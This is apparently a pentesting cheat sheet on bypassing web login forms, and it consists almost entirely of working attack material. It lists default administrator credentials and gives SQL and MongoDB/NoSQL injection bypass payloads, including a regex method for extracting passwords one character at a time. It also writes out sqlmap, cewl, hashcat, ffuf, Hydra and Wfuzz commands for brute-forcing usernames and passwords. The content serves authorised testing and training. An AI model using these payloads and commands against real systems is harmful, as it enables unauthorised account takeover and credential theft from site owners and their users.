Web Login Bypass
Last modified: 2023-08-31
Common Default Credentials
Check if the website has not changed credential from the default username/password.
admin:admin
admin:password
admin:password1
admin:password123
admin:passw0rd
admin:(empty)
admin:12345
administrator:password
administrator:password1
administrator:password123
administrator:passw0rd
administrator:(empty)
administrator:12345
# phpIPAM
admin:ipamadmin
Admin:ipamadmin
# PHPMyAdmin
root:(null)
root:password
SQL Injections
' or '1'='1
' or '1'='1--
or true--
' or true--
UNION SELECT null--
' UNION SELECT null--
' UNION SELECT 1,2--
Microsoft, Oracle, PostgreSQL
'--
' or 1=1--
' or '1'='1'--
}" or 1=1--
MySQL
'-- -
'#
' or 1=1#
' or 1=1-- -
' or '1'='1'-- -
' or '1'='1'#
}" or 1=1-- -
NoSQL Injection
Mongo
' || 1==1//
' || 1==1%00
' || '1==1
' || '1'=='1
-
Operators
# $ne: Not equal username[$ne]=xyz&password[$ne]=xyz # $regex: Regular expressions username[$regex]=.*&password[$regex]=.* username[$regex]=^xyz&password[$regex]=^xyz username[$regex]=^a.*$&password[$ne]=xyz username[$regex]=.{6}&password[$ne]=xyz username[$regex]=^.{1}&password[$regex]=^.{1} # Length of values # $exists: Exists in the database username[$exists]=true&password[$exists]=true # $nin: Not include username[$nin][admin]=admin&password[$ne]=xyz # If we found the "admin" exists, we can exclude "admin" by specifying $nin operator. username[$nin][]=admin&password[$ne]=xyz # If more users are found, we can exclude the user. username[$nin][]=admin&username[$nin][]=john&password[$ne]=xyz # $gt: Greater than username[$gt]=s&password[$gt]=s # $lt: Lower than username[$lt]=s&password[$lt]=s # Combinations username[$ne]=xyz&password[$regex]=.* username[$exists]=true&password[$ne]=xyz username[$ne]=xyz&password[$exists]=true username[$regex]=.*&password[$ne]=xyz username[$ne]=xyz&password[$regex]=.* username[$regex]=.{6}&password[$ne]=xyz
After finding usernames, we can also obtain the passwords using the “$regex” operator as the following example.
# Check if the password length is 7 characters. username=admin&password[$regex]=^.{7}$ # If not, change 7 to 6 (or 8 or something number). username=admin&password[$regex]=^.{6}$ # If the number of characters turns out to be 6, brute force the character one by one. username=admin&password[$regex]=^a.....$ username=admin&password[$regex]=^s.....$ username=admin&password[$regex]=^se....$ username=admin&password[$regex]=^sec...$
-
Operators in Json
If the above payloads not working, try changing to a json format.
We also need to change the value of the Content-Type to “application/json” in the HTTP header.Content-Type: application/json {"username": { "$ne": "xyz" }, "password": { "$ne": "xyz" }}
SQL Injection with SQLmap
Alternatively, we can automate SQLi using sqlmap
.
# 'req.txt' is a file which can be downloaded in Burp Suite by clicking `save item` on the request.
sqlmap -r req.txt
sqlmap -r req.txt --risk 2 --level 5
sqlmap -r req.txt --risk 3 --level 5
Please see SQL Injection with Sqlmap page for details.
Wildcard Brute Force
If it is allowed to login with wildcard (*), you may be able to find the username/password with brute force.
username = *
password = *
For example, in Turbo Intruder (Burp Suite), login attempt with alpha numeric characters one by one.
username=%s*&password=*
# or
username=*&password=%s*
My favorite wordlist for it is the seclists:
https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/alphanum-case-extra.txt
Brute Force Credentials
Before brute forcing, we need wordlists used for it.
-
Generate the custom wordlist from the target web page.
cewl https://vulnerable.com > scraped_words.txt
If we can predict the target password reasonably, we can generate passwords from the password.
echo -n 'passw0rd' > password.txt
hashcat --stdout password.txt -r /usr/share/hashcat/rules/best64.rule > passlist.txt
Using Ffuf
# -fc: Filter HTTP status code
ffuf -w passwords -X POST -d "username=admin&password=FUZZ" -u http://vulnerable.com/login -fc 401
# Basic Auth
ffuf -u https://admin:FUZZ@example.com/ -w wordlist.txt -fc 401
Also we can use raw request file of Burp Suite.
- Send request in Burp Suite.
- Right-click on the request screen.
- Click "Copy to file" in the menu.
- Edit the raw file to change target value to "FUZZ" keyword.
After that, we can use it in the ffuf
command.
# Interate with Burp Suite raw request
ffuf -u http://example.com/login -request raw.txt -x http://127.0.0.1:8080 -w wordlist.txt
Using Hydra
# Cracking username
hydra -L usernames.txt -p password vulnerable.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid username"
# Cracking password
hydra -l username -P passwords.txt vulnerable.com http-post-form "/login:username=^USER^&password=^PASS^:Invalid password"
# HTTPS (https-post-form)
hydra -L usernames.txt -P passwords.txt vulnerable.com https-post-form "/login:username=^USER^&password=^PASS^:Username or password is incorrect"
# Cracking the Authorization or WWW-Authenticate in the request header.
hydra -L usernames.txt -P passwords.txt <target-ip> http-get
Using Wfuzz
# Cracking username
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" https://example.com/login
# Cracking password
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" https://example.com/login
# Range: 00-99 -> "password00", "password01", ..., "password99"
# -t: N threads
# -s: N seconds per request
wfuzz -z range,00-99 -d "username=admin&password=passwordFUZZ&submit=Submit" -X POST -u https://example.com/login -t 1 -s 20
# -- Options --------------------------------------------------------------------------------------------
# --hc: Hide the specific status code
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" --hc 302 http://example.com/login
# --hh: Hide the specific chars (Content-Length)
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" --hh 783 http://example.com/login
# --sc: Show the specific statuc code
wfuzz -z file,./usernames.txt -d "username=FUZZ&password=password" --sc 302 http://example.com/login
# --sh: Show the specific chars (Content-Length)
wfuzz -z file,./passwords.txt -d "username=admin&password=FUZZ" --sh 1214 http://example.com/login